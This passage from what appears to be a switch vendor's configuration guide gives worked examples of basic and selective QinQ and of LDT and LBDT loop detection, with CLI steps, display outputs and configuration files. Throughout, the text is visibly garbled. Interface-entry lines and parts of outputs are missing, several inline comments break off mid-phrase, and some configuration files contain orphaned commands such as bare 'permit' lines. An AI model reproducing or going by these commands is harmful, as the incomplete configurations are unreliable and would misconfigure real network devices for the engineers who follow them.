of GE1/0/1 to VLAN 100 and the default VLAN of GE1/0/2 to VLAN 200. VLAN 100 and

VLAN 200 are added to outer tags. The configuration of SwitchB is similar to the
configuration of SwitchA, and is not mentioned here.
[SwitchA-GigabitEthernet1/0/1] port link-type dot1q-tunnel //Configure the link
type of the interface as QinQ.
[SwitchA-GigabitEthernet1/0/2] port link-type dot1q-tunnel //Configure the link
type of the interface as QinQ.
Step 3 Configure switch interfaces connected to the public network.

# Add GE1/0/3 on Switch A to VLAN 100 and VLAN 200. The configuration of SwitchB is
similar to the configuration of SwitchA, and is not mentioned here.
[SwitchA-GigabitEthernet1/0/3] port trunk allow-pass vlan 100 200
Step 4 Configure the TPID in the outer VLAN tag.

# Set the TPID in the outer VLAN tag to 0x9100 on SwitchA.
[SwitchA-GigabitEthernet1/0/3] qinq protocol 9100 //Set the TPID in the outer
VLAN tag to 0x9100.
# Set the TPID in the outer VLAN tag to 0x9100 on SwitchB.

[SwitchB-GigabitEthernet1/0/3] qinq protocol 9100 //Set the TPID in the outer
VLAN tag to 0x9100.

On a PC in a VLAN of a branch in enterprise 1, ping a PC in the same VLAN of the other
branch in enterprise 1. The ping operation succeeds, indicating that branches of enterprise 1
can communicate with each other.
On a PC in a VLAN of a branch in enterprise 2, ping a PC in the same VLAN of the other
branch in enterprise 2. The ping operation succeeds, indicating that branches of enterprise 2
can communicate with each other.
On a PC in a VLAN of a branch in enterprise 1, ping a PC in the same VLAN of a branch in
enterprise 2. The ping operation fails, indicating that enterprise 1 and enterprise 2 are isolated.
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100 200
#
port link-type dot1q-tunnel
#

#
qinq protocol 9100
#
return

#
sysname SwitchB
#
vlan batch 100 200
#
#
#
qinq protocol 9100
#
return
Related Content
Videos
Configuring QinQ
6.4.2 Example for Configuring VLAN ID-based Selective QinQ
QinQ Overview
Selective QinQ, also called VLAN stacking or QinQ stacking, is an extension of QinQ.
Selective QinQ is performed based on interfaces and VLAN IDs. In addition to functions of
basic QinQ, selective QinQ takes different actions for packets received by the same interface
based on VLANs.
VLAN ID-based selective QinQ adds different outer VLAN tags to packets with different
inner VLAN IDs.
Configuration Notes
When configuring selective QinQ on the switch, pay attention to the following points:
l Before configuring selective QinQ on a fixed switch, you must run the qinq vlan-
translation enable command to enable VLAN translation.

l Selective QinQ can only be enabled on hybrid interfaces in the inbound direction.
l The outer VLAN must be created before Selective QinQ is performed.
l When an interface configured with VLAN stacking needs to remove the outer tag from
outgoing frames, the interface must join the VLAN specified by stack-vlan in untagged
mode. If the outer VLAN does not need to be removed, the interface must join the
VLAN specified by stack-vlan in tagged mode.
l The device configured with selective QinQ can add only one outer VLAN tag to a frame
with an inner VLAN tag on an interface.
l If only single-tagged packets from a VLAN need to be transparently transmitted, do not
specify the VLAN as the inner VLAN of selective QinQ.
As shown in Figure 6-19, Internet access users (using PCs) and VoIP users (using VoIP
phones) connect to the ISP network through SwitchA and SwitchB and communicate with
each other through the ISP network.
In the enterprise, VLAN 100 is allocated to PCs and VLAN 300 is allocated to VoIP phones.
It is required that packets of PCs and VoIP phones are tagged VLAN 2 and VLAN 3
respectively when the packets are transmitted through the ISP network.
Figure 6-19 Networking of VLAN ID-based selective QinQ

SwitchA SwitchB
GE1/0/2 Carrier GE1/0/2
network
GE1/0/1 GE1/0/1
PC VoIP VoIP PC
1. Create VLANs on SwitchA and SwitchB.

2. Configure link types of interfaces and add interfaces to VLANs on SwitchA and
SwitchB.
3. Configure selective QinQ on interfaces of SwitchA and SwitchB.

Procedure
# On SwitchA, create VLAN 2 and VLAN 3, that is, VLAN IDs of the outer VLAN tag to be
added.
# On SwitchB, create VLAN 2 and VLAN 3, that is, VLAN IDs of the outer VLAN tag to be
added.
Step 2 Configure selective QinQ on interfaces.
# Configure GE1/0/1 on SwitchA.

[SwitchA-GigabitEthernet1/0/1] port link-type hybrid
[SwitchA-GigabitEthernet1/0/1] port hybrid untagged vlan 2 3 //Add the hybrid
interface to VLANs in untagged mode.
[SwitchA-GigabitEthernet1/0/1] port vlan-stacking vlan 100 stack-vlan 2 //
Configure the inner VLAN tag as VLAN 100 and add VLAN 2 in the outer VLAN tag.
[SwitchA-GigabitEthernet1/0/1] port vlan-stacking vlan 300 stack-vlan 3 //
# Configure GE1/0/1 on SwitchB.

[SwitchB-GigabitEthernet1/0/1] port hybrid untagged vlan 2 3 //Add the hybrid
interface to VLANs in untagged mode.
[SwitchB-GigabitEthernet1/0/1] port vlan-stacking vlan 100 stack-vlan 2 //
[SwitchB-GigabitEthernet1/0/1] port vlan-stacking vlan 300 stack-vlan 3 //
Step 3 Configure other interfaces.
# Add GE1/0/2 on SwitchA to VLAN 2 and VLAN 3.

# Add GE1/0/2 on SwitchB to VLAN 2 and VLAN 3.

If the configurations on SwitchA and SwitchB are correct, you can obtain the following
information:
l PCs can communicate with each other through the ISP network.

l VoIP phones can communicate with each other through the ISP network.
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 2 to 3
#
port hybrid untagged vlan 2 to 3
port vlan-stacking vlan 100 stack-vlan 2
#
#
return

#
sysname SwitchB
#
vlan batch 2 to 3
#
#
#
return
Related Content
Videos
Configuring QinQ
6.4.3 Example for Configuring Flow-based Selective QinQ
QinQ Overview
Selective QinQ, also called VLAN stacking or QinQ stacking, is an extension of QinQ.
Selective QinQ is performed based on interfaces and VLAN IDs. In addition to functions of
basic QinQ, selective QinQ takes different actions for packets received by the same interface
based on VLANs.

Flow-based selective QinQ adds outer VLAN tags based on traffic policies. It can provide
differentiated services based on service types.
Configuration Notes
When configuring selective QinQ on the switch, pay attention to the following points:
l Selective QinQ can only be enabled on hybrid interfaces in the inbound direction.
l The outer VLAN must be created before Selective QinQ is performed.
l When an interface configured with VLAN stacking needs to remove the outer tag from
outgoing frames, the interface must join the VLAN specified by stack-vlan in untagged
mode. If the outer VLAN does not need to be removed, the interface must join the
VLAN specified by stack-vlan in tagged mode.
l The device configured with selective QinQ can add only one outer VLAN tag to a frame
with an inner VLAN tag on an interface.
l If only single-tagged packets from a VLAN need to be transparently transmitted, do not
specify the VLAN as the inner VLAN of selective QinQ.
As shown in Figure 6-20, Internet access users (using PCs) and VoIP users (using VoIP
phones) connect to the ISP network through SwitchA and SwitchB and communicate with
each other through the ISP network.
It is required that packets of PCs and VoIP phones are tagged VLAN 2 and VLAN 3
respectively when the packets are transmitted through the ISP network. Flow-based selective
QinQ can be configured to meet the requirement.
Figure 6-20 Networking of flow-based selective QinQ

S w it c h A S w it c h B
G E 1 /0 /2 C a r r ie r G E 1 /0 /2
n e tw o rk
G E 1 /0 /1 G E 1 /0 /1
PC V o IP V o IP PC
VLAN 100~200 VLAN 300~400 VLAN 300~400 VLAN 100~200
1. Create VLANs on SwitchA and SwitchB.

2. Configure traffic classifiers, traffic behaviors, and traffic policies on SwitchA and
SwitchB.
3. Configure link types of interfaces on SwitchA and SwitchB and add the interfaces to
VLANs.
4. Apply the traffic policies to interfaces on SwitchA and SwitchB to implement selective
QinQ.
Procedure
# On SwitchA, create VLAN 2 and VLAN 3, that is, VLAN IDs of the outer VLAN tag to be
added.
# On SwitchB, create VLAN 2 and VLAN 3, that is, VLAN IDs of the outer VLAN tag to be
added.
Step 2 Configure traffic classifiers, traffic behaviors, and traffic policies on SwitchA and SwitchB.
# Configure the traffic classifiers, traffic behaviors, and traffic policy on SwitchA.
[SwitchA] traffic classifier name1 //Configure a traffic classifier named name1.
[SwitchA-classifier-name1] if-match vlan-id 100 to 200 //Configure a matching
rule to match packets from VLANs 100 to 200.
[SwitchA-classifier-name1] quit
[SwitchA] traffic behavior name1 //Configure a traffic behavior named name1.
[SwitchA-behavior-name1] nest top-most vlan-id 2 //Configure an action of adding
VLAN 2 in an outer VLAN tag in a traffic behavior. In V200R009 and later
versions, the command is changed to add-tag vlan-id.
[SwitchA-behavior-name1] quit
[SwitchA] traffic classifier name2 //Configure a traffic classifier named name2.
[SwitchA-classifier-name2] if-match vlan-id 300 to 400 //Configure a matching
[SwitchA-classifier-name2] quit
[SwitchA] traffic behavior name2 //Configure a traffic behavior named name2.
[SwitchA-behavior-name2] nest top-most vlan-id 3 //Configure an action of adding
[SwitchA-behavior-name2] quit
[SwitchA] traffic policy name1 //Configure a traffic policy named name1.
[SwitchA-trafficpolicy-name1] classifier name1 behavior name1
[SwitchA-trafficpolicy-name1] classifier name2 behavior name2
[SwitchA-trafficpolicy-name1] quit
# Configure the traffic classifiers, traffic behaviors, and traffic policy on SwitchB.
[SwitchB] traffic classifier name1 //Configure a traffic classifier named name1.
[SwitchB-classifier-name1] if-match vlan-id 100 to 200 //Configure a matching
[SwitchB-classifier-name1] quit
[SwitchB] traffic behavior name1 //Configure a traffic behavior named name1.
[SwitchB-behavior-name1] nest top-most vlan-id 2 //Configure an action of adding
[SwitchB-behavior-name1] quit
[SwitchB] traffic classifier name2 //Configure a traffic classifier named name2.
[SwitchB-classifier-name2] if-match vlan-id 300 to 400 //Configure a matching


[SwitchB-classifier-name2] quit
[SwitchB] traffic behavior name2 //Configure a traffic behavior named name2.
[SwitchB-behavior-name2] nest top-most vlan-id 3 //Configure an action of adding
[SwitchB-behavior-name2] quit
[SwitchB] traffic policy name1 //Configure a traffic policy named name1.
[SwitchB-trafficpolicy-name1] classifier name1 behavior name1
[SwitchB-trafficpolicy-name1] classifier name2 behavior name2
[SwitchB-trafficpolicy-name1] quit
Step 3 Apply the traffic policies to interfaces on SwitchA and SwitchB to implement selective QinQ.
# Configure GE1/0/1 on SwitchA.
[SwitchA-GigabitEthernet1/0/1] port hybrid untagged vlan 2 3
[SwitchA-GigabitEthernet1/0/1] traffic-policy name1 inbound //Apply the traffic
policy name1 to the interface in the inbound direction.
# Configure GE1/0/1 on SwitchB.

[SwitchB-GigabitEthernet1/0/1] port hybrid untagged vlan 2 3
[SwitchB-GigabitEthernet1/0/1] traffic-policy name1 inbound //Apply the traffic
policy name1 to the interface in the inbound direction.
Step 4 Configure other interfaces.



If the configurations on SwitchA and SwitchB are correct, you can obtain the following
information:
l PCs can communicate with each other through the ISP network.
l VoIP phones can communicate with each other through the ISP network.
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 2 to 3
#
traffic classifier name1 operator or precedence 5

if-match vlan-id 100 to 200

#
traffic behavior name1
permit
nest top-most vlan-id 2
permit
#
traffic policy name1 match-order config
classifier name1 behavior name1
#
traffic-policy name1 inbound
#
#
return

#
sysname SwitchB
#
vlan batch 2 to 3
#
#
permit
permit
#
traffic policy name1 match-order config
#
traffic-policy name1 inbound
#
#
return
6.5 Typical Loopback Detection Configuration

6.5.1 Example for Configuring LDT to Detect Loops on the
Downstream Network

LDT Overview
When a loop occurs on a network, broadcast, multicast, and unknown unicast packets are
repeatedly transmitted on the network. This wastes network resources or even causes network
breakdown. Quickly detecting loops on a Layer 2 network can minimize the impact of loops
on the entire network; therefore, a detection technology that notifies users of loops is required.
When a loop occurs, users are requested to check network connections and configurations,
and control the problematic interface.
Loop detection (LDT) periodically sends LDT packets on an interface to check whether the
packets return to the local device (receive and transmit interfaces can be different), and
determines whether loops occur on the interface, local network, or downstream network.
l If LDT packets are received by the same interface, a loopback occurs on the interface or
a loop occurs on the network connected to the interface.
l If LDT packets are received by another interface on the same device, a loop occurs on
the network connected to the interface.
After loops are detected, the device can send alarms to the NMS and record logs, and control
the interface status (the interface is shut down by default) according to the device
configuration so that the impact of loops on the device and network is minimized. The device
provides the following actions after LDT detects a loop:
l Trap: The device reports a trap to the NMS and records a log, but does not take any
action on the interface.
l Block: The device blocks this interface, and can forward only BPDUs.
l No learning: The interface is disabled from learning MAC addresses.
l Shutdown: The device shuts down the interface.
l Quitvlan: The interface is removed from the VLAN where a loop occurs.
The problematic interface continues to send LDT packets. If the device receives no LDT
packets from the problematic interface within the recovery time, it considers that the loop is
eliminated on the interface and restores the interface.
LDT can only detect loops on a single node, but cannot eliminate loops on the entire network
in the same manner as ring network technologies of ERPS, RRPP, SEP, Smart Link, and STP/
RSTP/MSTP/VBST.
Configuration Notes
l LDT and LBDT cannot be configured simultaneously.
l LDT needs to send a large number of LDT packets to detect loops, occupying system
resources. Therefore, disable LDT if loops do not need to be detected.
l When loops occur in multiple VLANs on many interfaces, LDT performance is lowered
due to limitations of security policies and CPU processing capability. The more VLANs
and interfaces are involved, the lower the performance is, especially performance of the
standby chassis in the cluster. Manually eliminating loops is recommended.
l LDT cannot be used with ring network technologies of ERPS, RRPP, SEP, Smart Link,
and STP/RSTP/MSTP/VBST. Do not configure ring network technologies on an
interface of a LDT-enabled VLAN. In contrary, if LDT has been enabled globally and
ring network technologies need to be configured on an interface, disable LDT on the
interface first.

l LDT sends only tagged packets and can only detect loops based on VLANs. LDT can
detect loops in a maximum of 4094 VLANs, and cannot detect loops in dynamic
VLANs.
l When a loop occurs on the network-side interface where the Block or Shutdown action
is configured, all services on the device are interrupted. Do not deploy LDT on the
network-side interface.
l The Quitvlan action cannot be used with GVRP, or the action of removing an interface
from the VLAN where MAC address flapping occurs.
As shown in Figure 6-21, a new branch network of an enterprise connects to the aggregation
switch Switch, and VLANs 10 to 20 are deployed on the branch network. Loops occur due to
incorrect connections or configurations. As a result, communication on the Switch and uplink
network is affected.
It is required that the Switch should immediately detect loops on the new branch network to
prevent the impact of loops on the Switch and uplink network.
Figure 6-21 Networking for configuring LDT to detect loops on the downstream network
Switch
GE1/0/1
New branch
VLAN 10-20
Loops need to be detected in VLANs 10 to 20 (more than eight VLANs) on the new branch
network, so you need to configure LDT on the Switch to detect loops on the new branch
network. The configuration roadmap is as follows:
1. Enable LDT on GE1/0/1 of the Switch to detect loops in a specified VLAN so that loops
on the downstream network can be detected.
2. Configure an action after loops are detected so that the Switch can immediately shut
down the interface where a loop is detected. This prevents the impact of the loop on the
Switch and uplink network.

NOTE
Configure interfaces on other switching devices as trunk or hybrid interfaces and configure these
interfaces to allow packets from corresponding VLANs to pass through to ensure Layer 2 connectivity
on the new network and between the new network and the Switch.
Procedure
Step 1 Enable global LDT.
[Switch] loop-detection enable //Enable LDT globally.
Step 2 Enable LDT in VLANs.

[Switch] vlan batch 10 to 20
[Switch] loop-detection enable vlan 10 to 20 //Enable the device to detect loops
on all interfaces in VLANs 10 to 20.
Step 3 Set the interval for sending LDT packets.

[Switch] loop-detection interval-time 10 //Set the interval for sending LDT
packets to 10s.
Step 4 Configure an action taken after a loop is detected.

# Enable the trap function for LDT.
[Switch] snmp-agent trap enable feature-name ldttrap //Enable the LDT alarm
function so that the device can send LDT traps.
# Set the action to Shutdown.

[Switch-GigabitEthernet1/0/1] port link-type hybrid //The default link type of a
switch interface is not hybrid. You can choose run the port link-type hybrid
command to configure the link type of the interface as hybrid.
[Switch-GigabitEthernet1/0/1] stp disable //Disable STP on the interface.
[Switch-GigabitEthernet1/0/1] port hybrid tagged vlan 10 to 20
[Switch-GigabitEthernet1/0/1] loop-detection mode port-shutdown ///Configure the
Shutdown action to be taken on GE1/0/1 after a loop is detected.

# After the configuration is complete, run the display loop-detection command to check
global LDT information.
[Switch] display loop-detection
Loop Detection is enabled.
Detection interval time is 10 seconds.
Following VLANs enable loop-detection:
VLAN 10 to 20
Following ports are blocked for loop:
NULL
Following ports are shutdown for loop:
GigabitEthernet1/0/1 Include Vlans:
10
Following ports are nolearning for loop:
NULL
Following ports are trapped for loop:
NULL
Following ports are quitvlan for loop:
NULL
# Check LDT information on GE1/0/1.

[Switch] display loop-detection interface gigabitethernet 1/0/1
The port is enabled.

The port's status list:

Status WorkMode Recovery-time EnabledVLAN
-----------------------------------------------------------------------
Shutdown Shutdown 255 10
Normal Shutdown 255 11
The command output shows that LDT is enabled in VLANs 10 to 20 and the Shutdown
action is taken on GE1/0/1 in VLAN 10, indicating that loops are detected in VLAN 10.
NOTE
After loops are detected in a or some VLANs, the system shuts down an interface and loops are
removed. In this case, LDT may be unable to detect all VLANs where loops occur.
----End
Configuration Files
#
sysname Switch
#
vlan batch 10 to 20
#
loop-detection enable
loop-detection interval-time 10
loop-detection enable vlan 10 to 20
#
port hybrid tagged vlan 10 to 20
stp disable
#
snmp-agent trap enable feature-name LDTTRAP
#
return
6.5.2 Example for Configuring LDT to Detect Loops on the Local

Network
LDT Overview
Loop detection (LDT) periodically sends LDT packets on an interface to check whether the
packets return to the local device (receive and transmit interfaces can be different), and
determines whether loops occur on the interface, local network, or downstream network.

l If LDT packets are received by the same interface, a loopback occurs on the interface or
a loop occurs on the network connected to the interface.
l If LDT packets are received by another interface on the same device, a loop occurs on
the network connected to the interface.
provides the following actions after LDT detects a loop:
The problematic interface continues to send LDT packets. If the device receives no LDT
packets from the problematic interface within the recovery time, it considers that the loop is
eliminated on the interface and restores the interface.
LDT can only detect loops on a single node, but cannot eliminate loops on the entire network
in the same manner as ring network technologies of ERPS, RRPP, SEP, Smart Link, and STP/
RSTP/MSTP/VBST.
Configuration Notes
l LDT and LBDT cannot be configured simultaneously.
l LDT needs to send a large number of LDT packets to detect loops, occupying system
resources. Therefore, disable LDT if loops do not need to be detected.
l When loops occur in multiple VLANs on many interfaces, LDT performance is lowered
due to limitations of security policies and CPU processing capability. The more VLANs
and interfaces are involved, the lower the performance is, especially performance of the
standby chassis in the cluster. Manually eliminating loops is recommended.
l LDT cannot be used with ring network technologies of ERPS, RRPP, SEP, Smart Link,
and STP/RSTP/MSTP/VBST. Do not configure ring network technologies on an
interface of a LDT-enabled VLAN. In contrary, if LDT has been enabled globally and
ring network technologies need to be configured on an interface, disable LDT on the
interface first.
l LDT sends only tagged packets and can only detect loops based on VLANs. LDT can
detect loops in a maximum of 4094 VLANs, and cannot detect loops in dynamic
VLANs.
l When a loop occurs on the network-side interface where the Block or Shutdown action
is configured, all services on the device are interrupted. Do not deploy LDT on the
network-side interface.
As shown in Figure 6-22, an enterprise uses Layer 2 networking. The Switch is the
aggregation switch, and each switch allows packets from VLANs 10 to 20 to pass through.

Because employees often move, the network topology changes frequently. Connections or
configurations may be incorrect due to misoperations. As a result, loops may occur in VLANs
10 to 20.
Loops cause broadcast storms and affect device and network communication. It is required
that loops be detected and eliminated in VLANs in a timely manner to prevent broadcast
storms.
Figure 6-22 Networking for configuring LDT to detect loops on the local network
Switch
GE1/0/0 GE2/0/0
VLAN 10~20
Loops need to be detected in VLANs 10 to 20. Because there are more than eight VLANs,
you can configure LDT to detect loops and configure an action after loops are detected to
prevent broadcast storms. All VLANs share a link. To prevent loop removal in a VLAN from
affecting data forwarding in other VLANs, configure the Quitvlan action. The configuration
roadmap is as follows:
1. Enable LDT on GE1/0/0 and GE2/0/0 on the Switch to detect loops in VLANs 10 to 20.
2. Configure an action to be taken after a loop is detected on GE1/0/0 and GE2/0/0, and set
the recovery time so that the Switch can immediately take the preconfigured action on
the interface to prevent broadcast storms after a loop is detected. In addition, the Switch
can restore the interface after the loop is eliminated.
NOTE
interfaces to allow packets from corresponding VLANs to pass through to ensure Layer 2 connectivity.
Procedure
Step 1 Enable global LDT.
[Switch] loop-detection enable //Enable LDT globally.
Step 2 Enable LDT in VLANs.

[Switch] loop-detection enable vlan 10 to 20 //Enable the device to detect loops
on all interfaces in VLANs 10 to 20.
Step 3 Set the interval for sending LDT packets.

[Switch] loop-detection interval-time 10 //Set the interval for sending LDT
packets to 10s.

Step 4 Configure an action to be taken after a loop is detected.

# Enable the trap function for LDT.
[Switch] snmp-agent trap enable feature-name ldttrap //Enable the LDT alarm
function so that the device can send LDT traps.
# Set the action to Quitvlan.

[Switch-GigabitEthernet1/0/0] loop-detection mode port-quitvlan //Configure the
Quitvlan action to be taken after a loop is detected.
[Switch-GigabitEthernet2/0/0] port link-type hybrid
[Switch-GigabitEthernet2/0/0] loop-detection mode port-quitvlan //Configure the
Quitvlan action to be taken after a loop is detected.
Step 5 Set the interface recovery time.

[Switch-GigabitEthernet1/0/0] loop-detection recovery-time 30 //Set the recovery
time to 30s.
[Switch-GigabitEthernet2/0/0] loop-detection recovery-time 30 //Set the recovery
time to 30s.

1. Check the LDT configuration.
# After the configuration is complete, run the display loop-detection command to check
global LDT information.
[Switch] display loop-detection
Loop Detection is enabled.
Detection interval time is 10 seconds.
Following VLANs enable loop-detection:
VLAN 10 to 20
Following ports are blocked for loop:
NULL
Following ports are shutdown for loop:
NULL
Following ports are nolearning for loop:
NULL
Following ports are trapped for loop:
NULL
Following ports are quitvlan for loop:
10 11 12 16 19
13 14 15 17 18
20
# Check LDT information on GE1/0/0 and GE2/0/0.

-----------------------------------------------------------------------
Quitvlan Quitvlan 30 10

Normal Quitvlan 30 13
-----------------------------------------------------------------------
In the command output, LDT is enabled in VLANs 10 to 20, GE1/0/0 is removed from
VLANs 10, 11, 12, 16, and 19, and GE2/0/0 is removed from VLANs 13, 14, 15, 17, 18,
and 20.
NOTE
The VLANs that an interface is removed from are uncertain, but the interface will be removed
from all VLANs where loops occur.
2. After the loop is eliminated (for example, GE2/0/0 is shut down, and connections
between devices are corrected), check whether GE1/0/0 and GE2/0/0 are restored.
-----------------------------------------------------------------------
-----------------------------------------------------------------------

The command output shows that GE1/0/0 and GE2/0/0 are restored.
----End
Configuration Files
#
sysname Switch
#
vlan batch 10 to 20
#
loop-detection enable
loop-detection interval-time 10
loop-detection enable vlan 10 to 20
#
stp disable
loop-detection mode port-quitvlan
loop-detection recovery-time 30
#
stp disable
loop-detection mode port-quitvlan
loop-detection recovery-time 30
#
snmp-agent trap enable feature-name LDTTRAP
#
return
6.5.3 Example for Configuring LBDT to Detect Loopbacks on an

Interface
LBDT Overview
Loopback detection (LBDT) periodically sends LBDT packets on an interface to check
whether the packets return to the local device (receive and transmit interfaces can be
different), and determines whether loops occur on the interface, local network, or downstream
network.
l If LBDT packets are received and sent by the same interface, a loopback occurs on the
interface or a loop occurs on the network connected to the interface.
l If LBDT packets are received by another interface on the same device, a loop occurs on
the network connected to the interface or device.

provides the following actions after LBDT detects a loop:
The problematic interface continues to send LBDT packets. After the configured recovery
time expires, the system attempts to restore the problematic interface. If the device receives
no LBDT packets from the problematic interface within the next recovery time, it considers
that the loop is eliminated on the interface and restores the interface.
LBDT can only detect loops on a single node, but cannot eliminate loops on the entire
network in the same manner as ring network technologies of ERPS, RRPP, SEP, Smart Link,
and STP/RSTP/MSTP/VBST.
Configuration Notes
l LBDT needs to send a large number of LBDT packets to detect loops, occupying system
resources. Therefore, disable LBDT if loops do not need to be detected.
l LBDT cannot be configured on an Eth-Trunk or its member interfaces.
l Do not use LBDT with ERPS, RRPP, SEP, Smart Link, or STP/RSTP/MSTP/VBST.
l An interface can send LBDT packets with the specified VLAN tag only when the
specified VLAN has been created.
l LBDT can detect loops in a maximum of eight VLANs, and cannot detect loops in
dynamic VLANs.
l When loops in the default VLAN of an interface need to be detected or an interface joins
the detected VLAN in untagged mode, LBDT may fail to detect loops. This is because
the VLAN tag of LBDT packets is removed and the packet priority changes.
l When the Quitvlan action is used, the configuration file remains unchanged.
l On a modular switch, LBDT and loop detection (LDT) cannot be configured
simultaneously.
As shown in Figure 6-23, aggregation switch SwitchA on an enterprise network connects to
access switch SwitchB. To prevent loopbacks on a TX-RX interface (GE1/0/0) because
optical fibers are connected incorrectly or the interface is damaged by high voltage, SwitchA
is required to detect loopbacks on GE1/0/0. Furthermore, it is required that the interface be
blocked to reduce the impact of the loopback on the network when a loopback is detected, and
the interface be restored after the loopback is removed.

Figure 6-23 Networking for configuring LBDT to detect loopbacks on an interface

S w itc h A
G E 1 /0 /0
Tx Rx
G E 1 /0 /0
S w itc h B
To detect loopbacks on downlink interface GE1/0/0 of SwitchA, configure LBDT on GE1/0/0
of SwitchA. The configuration roadmap is as follows:
1. Enable LBDT on GE1/0/0 of SwitchA to detect loopbacks.

2. Configure an action to be taken after a loopback is detected and set the recovery time.
After a loopback is detected, the Switch blocks the interface to reduce the impact of the
loopback on the network. After a loop is eliminated, the interface can be restored.
Procedure
Step 1 Enable LBDT on an interface.
[SwitchA-GigabitEthernet1/0/0] loopback-detect enable //Enable LBDT on the
interface.
Step 2 Configure an action to be taken after a loop is detected and set the recovery time.
[SwitchA-GigabitEthernet1/0/0] loopback-detect action block //Configure the
Block action to be taken after a loop is detected.
[SwitchA-GigabitEthernet1/0/0] loopback-detect recovery-time 30 //Set the
recovery delay to 30s.

1. Run the display loopback-detect command to check the LBDT configuration.
[SwitchA] display loopback-detect
Loopback-detect sending-packet interval:
5
------------------------------------------------------------------------------
----
Interface RecoverTime Action
Status
------------------------------------------------------------------------------
----
GigabitEthernet1/0/0 30 block
NORMAL

------------------------------------------------------------------------------
----
The preceding command output shows that the LBDT configuration is successful.
2. After about 5s, run the display loopback-detect command to check whether GE1/0/0 is
blocked.
5
------------------------------------------------------------------------------
----
Status
------------------------------------------------------------------------------
----
GigabitEthernet1/0/0 30 block BLOCK(Loopback
detected)
------------------------------------------------------------------------------
----
The preceding command output shows that GE1/0/0 is blocked, indicating that a
loopback occurs on GE1/0/0.
3. Manually remove the loopback. Run the display loopback-detect command to check
whether GE1/0/0 is restored.
5
------------------------------------------------------------------------------
----
Status
------------------------------------------------------------------------------
----
NORMAL
------------------------------------------------------------------------------
----
The preceding command output shows that GE1/0/0 is restored.
----End
Configuration Files
#
sysname SwitchA
#
loopback-detect recovery-time 30
loopback-detect enable
loopback-detect action block
#
return

6.5.4 Example for Configuring LBDT to Detect Loops on the

Downstream Network
LBDT Overview
network.
Configuration Notes

dynamic VLANs.
simultaneously.
As shown in Figure 6-24, a new department of an enterprise connects to the aggregation
switch Switch, and this department belongs to VLAN 100. Loops occur due to incorrect
connections or configurations. As a result, communication on the Switch and uplink network
is affected.
It is required that the Switch should detect loops on the new network to prevent the impact of
loops on the Switch and connected network.
Figure 6-24 Networking for configuring LBDT to detect loops on the downstream network
Switch
GE1/0/1
New Department
VLAN 100
The new department network has only VLAN 100, so configure LBDT on the Switch to
detect loops. The configuration roadmap is as follows:
1. Enable LBDT on GE1/0/1 of the Switch to detect loops in a specified VLAN so that
loops on the downstream network can be detected.
2. Set LBDT parameters so that the Switch can immediately shut down GE1/0/1 after a
loop is detected. This prevents the impact of the loop on the Switch and connected
network.

NOTE
interfaces to allow packets from corresponding VLANs to pass through to ensure Layer 2 connectivity
on the new network and between the new network and the Switch.
Procedure
Step 1 Enable LBDT on the interface.
[Switch-GigabitEthernet1/0/1] loopback-detect enable //Enable LBDT on the
interface.
Step 2 Specify the VLAN ID of LBDT packets.

[Switch] vlan 100
[Switch] interface gigabitEthernet 1/0/1
[Switch-GigabitEthernet1/0/1] port hybrid tagged vlan 100
[Switch-GigabitEthernet1/0/1] loopback-detect packet vlan 100 //Enable LBDT to
detect loops in VLAN 100.
Step 3 Configure LBDT parameters.

# Set the interval for sending LBDT packets.
[Switch] loopback-detect packet-interval 10
# Configure an action to be taken after a loop is detected.

[Switch-GigabitEthernet1/0/1] loopback-detect action shutdown //Configure the
Shutdown action to be taken after a loop is detected.

[Switch] display loopback-detect
10
------------------------------------------------------------------------------
----
Status
------------------------------------------------------------------------------
----
GigabitEthernet1/0/1 - shutdown
NORMAL
------------------------------------------------------------------------------
----
2. Construct loops on the downstream network and run the display loopback-detect
command to check whether GE1/0/1 is shut down.
oopback-detect sending-packet interval:

10
------------------------------------------------------------------------------
----
Status
------------------------------------------------------------------------------
----
GigabitEthernet1/0/1 - shutdown SHUTDOWN(Loopback
detected)
------------------------------------------------------------------------------
----
The preceding command output shows that GE1/0/1 is shut down.
----End
Configuration Files
#
sysname Switch
#
vlan batch 100
#
loopback-detect packet-interval 10
#
port hybrid tagged vlan 100
loopback-detect packet vlan 100
#
return
6.5.5 Example for Configuring LBDT to Detect Loops on the Local

Network
LBDT Overview

network.

Configuration Notes
dynamic VLANs.
simultaneously.
As shown in Figure 6-25, a small-scale enterprise uses Layer 2 networking and belongs to
VLAN 100. Because employees often move, the network topology changes frequently. Loops
occur due to incorrect connections or configurations during the change. As a result, broadcast
storms occur and affect communication of the Switch and entire network.
The requirements are as follows:

l The Switch detects loops.

l When a loop exists, the interface is blocked to reduce the impact of the loop on the
Switch and network.
l When the loop is eliminated, the interface can be restored.
Figure 6-25 Networking for configuring LBDT to detect loops on the local network
Switch
GE1/0/1 GE1/0/2
VLAN 100
To detect loops on the network where the Switch is deployed, configure LBDT on GE1/0/1
and GE1/0/2 of the Switch. In this example, untagged LBDT packets sent by the Switch will
be discarded by other switches on the network. As a result, the packets cannot be sent back to
the Switch, and LBDT fails. Therefore, LBDT is configured in a specified VLAN. The
1. Enable LBDT on interfaces and configure the Switch to detect loops in VLAN 100 to
implement LBDT on the network where the Switch is located.
2. Configure an action to be taken after a loop is detected and set the recovery time. After a
loop is detected, the Switch blocks the interface to reduce the impact of the loop on the
network. After a loop is eliminated, the interface can be restored.
NOTE
interfaces to allow packets from corresponding VLANs to pass through to ensure Layer 2 connectivity.
Procedure
Step 1 Enable LBDT on interfaces.
interface.
interface.
Step 2 Specify the VLAN ID of LBDT packets.

[Switch] vlan 100

Step 3 Configure an action to be taken after a loop is detected and set the recovery time.
[Switch-GigabitEthernet1/0/1] loopback-detect action block //Configure the Block
action to be taken after a loop is detected.
[Switch-GigabitEthernet1/0/1] loopback-detect recovery-time 30 //Set the
recovery time to 30s.
[Switch-GigabitEthernet1/0/2] loopback-detect action block //Configure the Block
action to be taken after a loop is detected.
[Switch-GigabitEthernet1/0/2] loopback-detect recovery-time 30 //Set the
recovery time to 30s.

5
------------------------------------------------------------------------------
----
Status
------------------------------------------------------------------------------
----
NORMAL
GigabitEthernet1/0/2 30 block NORMAL
------------------------------------------------------------------------------
----
2. After about 5s, run the display loopback-detect command to check whether GE1/0/1 or
GE1/0/2 is blocked.
5
------------------------------------------------------------------------------
----
Status
------------------------------------------------------------------------------
----
NORMAL
GigabitEthernet1/0/2 30 block BLOCK(Loopback
